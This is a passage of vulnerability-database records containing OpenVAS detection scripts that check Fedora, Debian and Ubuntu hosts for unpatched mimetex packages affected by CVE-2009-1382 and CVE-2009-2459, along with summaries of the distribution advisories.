E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511049\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.71~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mimetex-debuginfo\", rpm:\"mimetex-debuginfo~1.71~1.fc10\", rls:\"FC10\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:02", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-03-25T00:00:00", "id": "OPENVAS:1361412562310865498", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865498", "type": "openvas", "title": "Fedora Update for mimetex FEDORA-2013-3910", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mimetex FEDORA-2013-3910\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100898.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865498\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-25 11:03:01 +0530 (Mon, 25 Mar 2013)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"FEDORA\", value:\"2013-3910\");\n script_name(\"Fedora Update for mimetex FEDORA-2013-3910\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'mimetex'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"mimetex on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.74~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-21T11:33:09", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "Check for the Version of mimetex", "modified": "2017-12-21T00:00:00", "published": "2010-04-16T00:00:00", "id": "OPENVAS:861871", "href": "http://plugins.openvas.org/nasl.php?oid=861871", "type": "openvas", "title": "Fedora Update for mimetex FEDORA-2010-6546", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mimetex FEDORA-2010-6546\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mimetex on Fedora 12\";\ntag_insight = \"MimeTeX lets you easily embed LaTeX math in your html pages. It parses a LaTeX\n math expression and immediately emits the corresponding gif image, rather than\n the usual TeX dvi. And mimeTeX is an entirely separate little program that\n doesn't use TeX or its fonts in any way.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-April/039314.html\");\n script_id(861871);\n script_version(\"$Revision: 8205 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-21 07:30:37 +0100 (Thu, 21 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-04-16 17:02:11 +0200 (Fri, 16 Apr 2010)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2010-6546\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_name(\"Fedora Update for mimetex FEDORA-2010-6546\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mimetex\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.71~1.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:39:15", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "The remote host is missing an update to mimetex\nannounced via advisory FEDORA-2009-10170.", "modified": "2018-04-06T00:00:00", "published": "2009-11-11T00:00:00", "id": "OPENVAS:136141256231066196", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066196", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-10170 (mimetex)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_10170.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-10170 (mimetex)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\n- Fixes a buffer-overflow as detailed in #511049. - Updates to 1.7.\n\nChangeLog:\n\n* Thu Oct 1 2009 Jorge Torres - 1.71-1\n- Update to 1.71\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update mimetex' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-10170\";\ntag_summary = \"The remote host is missing an update to mimetex\nannounced via advisory FEDORA-2009-10170.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66196\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-11-11 15:56:44 +0100 (Wed, 11 Nov 2009)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Core 11 FEDORA-2009-10170 (mimetex)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=511049\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.71~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"mimetex-debuginfo\", rpm:\"mimetex-debuginfo~1.71~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:51:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "Check for the Version of mimetex", "modified": "2017-07-10T00:00:00", "published": "2013-03-25T00:00:00", "id": "OPENVAS:865492", "href": "http://plugins.openvas.org/nasl.php?oid=865492", "type": "openvas", "title": "Fedora Update for mimetex FEDORA-2013-3902", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mimetex FEDORA-2013-3902\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mimetex on Fedora 17\";\ntag_insight = \"MimeTeX lets you easily embed LaTeX math in your html pages. It parses a LaTeX\n math expression and immediately emits the corresponding gif image, rather than\n the usual TeX dvi. And mimeTeX is an entirely separate little program that\n doesn't use TeX or its fonts in any way.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100906.html\");\n script_id(865492);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-25 11:01:31 +0530 (Mon, 25 Mar 2013)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3902\");\n script_name(\"Fedora Update for mimetex FEDORA-2013-3902\");\n\n script_summary(\"Check for the Version of mimetex\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.74~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-02-06T13:10:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "Check for the Version of mimetex", "modified": "2018-02-05T00:00:00", "published": "2013-03-25T00:00:00", "id": "OPENVAS:865498", "href": "http://plugins.openvas.org/nasl.php?oid=865498", "type": "openvas", "title": "Fedora Update for mimetex FEDORA-2013-3910", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mimetex FEDORA-2013-3910\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"mimetex on Fedora 18\";\ntag_insight = \"MimeTeX lets you easily embed LaTeX math in your html pages. It parses a LaTeX\n math expression and immediately emits the corresponding gif image, rather than\n the usual TeX dvi. And mimeTeX is an entirely separate little program that\n doesn't use TeX or its fonts in any way.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2013-March/100898.html\");\n script_id(865498);\n script_version(\"$Revision: 8672 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-05 17:39:18 +0100 (Mon, 05 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-25 11:03:01 +0530 (Mon, 25 Mar 2013)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2013-3910\");\n script_name(\"Fedora Update for mimetex FEDORA-2013-3910\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mimetex\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"mimetex\", rpm:\"mimetex~1.74~1.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-04-06T11:37:05", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "The remote host is missing an update to mimetex\nannounced via advisory DSA 1917-1.", "modified": "2018-04-06T00:00:00", "published": "2009-10-27T00:00:00", "id": "OPENVAS:136141256231066101", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066101", "type": "openvas", "title": "Debian Security Advisory DSA 1917-1 (mimetex)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1917_1.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory DSA 1917-1 (mimetex)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several vulnerabilities have been discovered in mimetex, a lightweight\nalternative to MathML. The Common Vulnerabilities and Exposures project\nidentifies the following problems:\n\nCVE-2009-1382\n\nChris Evans and Damien Miller, discovered multiple stack-based buffer overflow.\nAn attacker could execute arbitrary code via a TeX file with long picture,\ncircle, input tags.\n\nCVE-2009-2459\n\nChris Evans discovered that mimeTeX contained certain directives that may be\nunsuitable for handling untrusted user input. A remote attacker can obtain\nsensitive information.\n\n\nFor the oldstable distribution (etch), these problems have been fixed in\nversion 1.50-1+etch1.\n\nDue to a bug in the archive system, the fix for the stable distribution\n(lenny) will be released as version 1.50-1+lenny1 once it is available.\n\nFor the testing distribution (squeeze), and the unstable distribution (sid),\nthese problems have been fixed in version 1.50-1.1.\n\n\nWe recommend that you upgrade your mimetex packages.\";\ntag_summary = \"The remote host is missing an update to mimetex\nannounced via advisory DSA 1917-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201917-1\";\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66101\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-27 01:37:56 +0100 (Tue, 27 Oct 2009)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Debian Security Advisory DSA 1917-1 (mimetex)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mimetex\", ver:\"1.50-1+etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:28:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "The remote host is missing an update to mimetex\nannounced via advisory USN-844-1.", "modified": "2017-12-01T00:00:00", "published": "2009-10-13T00:00:00", "id": "OPENVAS:65751", "href": "http://plugins.openvas.org/nasl.php?oid=65751", "type": "openvas", "title": "Ubuntu USN-844-1 (mimetex)", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: ubuntu_844_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# $Id: ubuntu_844_1.nasl 7969 2017-12-01 09:23:16Z santu $\n# Description: Auto-generated from advisory USN-844-1 (mimetex)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_solution = \"The problem can be corrected by upgrading your system to the\n following package versions:\n\nUbuntu 8.04 LTS:\n mimetex 1.50-1ubuntu0.8.04.1\n\nUbuntu 8.10:\n mimetex 1.50-1ubuntu0.8.10.1\n\nUbuntu 9.04:\n mimetex 1.50-1ubuntu0.9.04.1\n\nIn general, a standard system upgrade is sufficient to effect the\nnecessary changes.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=USN-844-1\";\n\ntag_insight = \"Chris Evans discovered that mimeTeX incorrectly handled certain long tags.\nAn attacker could exploit this with a crafted mimeTeX expression and cause\na denial of service or possibly execute arbitrary code. (CVE-2009-1382)\n\nChris Evans discovered that mimeTeX contained certain directives that may\nbe unsuitable for handling untrusted user input. This update fixed the\nissue by disabling the \\input and \\counter tags. (CVE-2009-2459)\";\ntag_summary = \"The remote host is missing an update to mimetex\nannounced via advisory USN-844-1.\";\n\n \n\n\nif(description)\n{\n script_id(65751);\n script_version(\"$Revision: 7969 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 10:23:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-10-13 18:25:40 +0200 (Tue, 13 Oct 2009)\");\n script_cve_id(\"CVE-2009-1382\", \"CVE-2009-2459\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Ubuntu USN-844-1 (mimetex)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-844-1/\");\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"mimetex\", ver:\"1.50-1ubuntu0.8.04.1\", rls:\"UBUNTU8.04 LTS\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mimetex\", ver:\"1.50-1ubuntu0.8.10.1\", rls:\"UBUNTU8.10\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"mimetex\", ver:\"1.50-1ubuntu0.9.04.1\", rls:\"UBUNTU9.04\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-19T15:05:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-1382", "CVE-2009-2459"], "description": "Check for the Version of mimetex", "modified": "2018-01-19T00:00:00", "published": "2010-04-16T00:00:00", "id": "OPENVAS:1361412562310861871", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861871", "type": "openvas", "title": "Fedora Update for mimetex FEDORA-2010-6546", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mimetex FEDORA-2010-6546\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mimetex on Fedora 12\";\ntag_insight = \"MimeTeX lets you easily embed LaTeX math in your html pages. It parses a LaTeX\n math expression and immediately emits the corresponding gif image, rather than\n the usual TeX dvi. And mimeTeX is an entirely separate little program that\n doesn't use TeX or its fonts in any way.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-April/039314.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861871\");\n script_version(\"$Revision: 8469 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-19 08:58:21 +0100 (Fri, 19 Jan 2018) $\");\n script_tag(name:\"creation_date\", 